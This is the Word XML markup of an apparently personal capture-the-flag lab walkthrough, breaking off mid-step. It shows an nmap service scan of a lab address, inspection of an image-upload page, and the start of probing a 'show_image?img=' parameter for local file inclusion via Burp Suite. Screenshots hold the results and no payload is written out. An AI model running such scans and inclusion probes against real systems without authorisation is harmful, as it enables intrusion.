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B17E1" w14:textId="5F3BD1DA" w:rsidR="004B5CE9" w:rsidRDefault="00C37B9B" w:rsidP="00C37B9B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pinged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A1121" w14:textId="69E65AE4" w:rsidR="00C37B9B" w:rsidRDefault="001D6DE2" w:rsidP="00C37B9B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p22,8080 10.10.11.204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C25E5" w14:textId="5E3A4137" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6281CC5D" wp14:editId="138EA4B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4815840" cy="3046048"/>
            <wp:effectExtent l="0" t="0" r="3810" b="254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5840" cy="30460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F2AC7" w14:textId="79CE72F1" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1395C3B8" w14:textId="2620CA5D" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101C6EBC" w14:textId="6B008A10" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657A9389" w14:textId="2A7AE861" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4831A382" w14:textId="6B9C430C" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3645DC9F" w14:textId="681CF82A" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC10DC2" w14:textId="7B7363DA" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E12D99" w14:textId="11417060" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ED926D" w14:textId="2C7F5966" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0704546C" w14:textId="4D5874F0" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A18E83" w14:textId="085CEDE0" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDAD1A8" w14:textId="6BAE0EF1" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADEBEA8" w14:textId="438620E7" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E35A7F" w14:textId="37C9FC67" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73047E97" wp14:editId="17437D3F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>53340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>80645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3001645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135511D" w14:textId="0C02D6E7" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BCBA95" w14:textId="58EEE3D2" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5516A212" w14:textId="295F8CAA" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Check website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE7C8B" w14:textId="09F242BB" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF6BB6E" w14:textId="3695C290" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739D2033" w14:textId="4211D67E" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259792CB" w14:textId="3CF7BADF" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3E9DAF" w14:textId="3BA8AF12" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712709AD" w14:textId="5FDA8EFC" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA11D07" w14:textId="620A36CC" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454C15C0" w14:textId="67A0414B" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B49486" w14:textId="105FB707" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD92597" w14:textId="767027F4" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE44717" w14:textId="1D09D9DB" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DFC908" w14:textId="754741BC" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8B3E98" w14:textId="745C2D0C" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4160B343" w14:textId="2B4F3B34" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D811EB2" w14:textId="08BEB38E" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344E34E7" w14:textId="03EE6797" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C81A554" w14:textId="042C7C36" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAB07B7" w14:textId="3A3E0BF1" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Nothing interesting found on the website/source code, besides the upload page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795CF616" w14:textId="12B5F8BD" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="025FD8EF" wp14:editId="72C5152A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>215264</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6134100" cy="1855317"/>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4100" cy="185531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lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload a picture and see what it does with it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADB7933" w14:textId="0DC9E951" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1608820C" w14:textId="3F00638C" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF7BC31" w14:textId="16FB5E79" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4464040D" w14:textId="4BFC3420" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25687B74" w14:textId="3454E416" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BEFCC1" w14:textId="62C769D2" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1963C810" wp14:editId="307BAFFA">
            <wp:extent cx="5731510" cy="1644650"/>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44650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D04383F" wp14:editId="1F4E223E">
            <wp:extent cx="5731510" cy="3063875"/>
            <wp:effectExtent l="0" t="0" r="254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56E60D09" w14:textId="37CD4493" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>So we see that our picture gets uploaded, and the website gives us the option to view it. When we click the link to view it, it takes use to this link /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>show_image?img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">=image.jpg, where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the parameter that takes the name of the file we want to see.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FCB56F" w14:textId="1058D68D" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> part could be an LFI vuln. So before we even try to upload malicious files, or check for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection \. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>lfi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7916CD4B" w14:textId="2EF46789" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AED05D" w14:textId="18A4C07E" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E2FCE92" wp14:editId="0379619E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>253365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2858135"/>
            <wp:effectExtent l="0" t="0" r="254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anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and take a look at the request when we view our uploaded image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B123BD3" w14:textId="62A2A015" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E4383C" w14:textId="5E3B2B04" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEE2BFF" w14:textId="321A8C8F" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8F2942" w14:textId="722EA49C" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026DFA7F" w14:textId="502F9D7F" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB9F64B" w14:textId="722A6DF7" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4F5C2D" w14:textId="491E6BC1" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75938430" w14:textId="37432BB6" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F0ABC7" w14:textId="6785D487" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We see in the response the content of the file we requested in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B8AFB" w14:textId="7D52F1FE" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>lfi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB3CAB" w14:textId="6BF19550" w:rsidR="001D6DE2" w:rsidRDefault="001D6DE2" w:rsidP="001D6DE2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36A5017D" wp14:editId="06E1F821">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
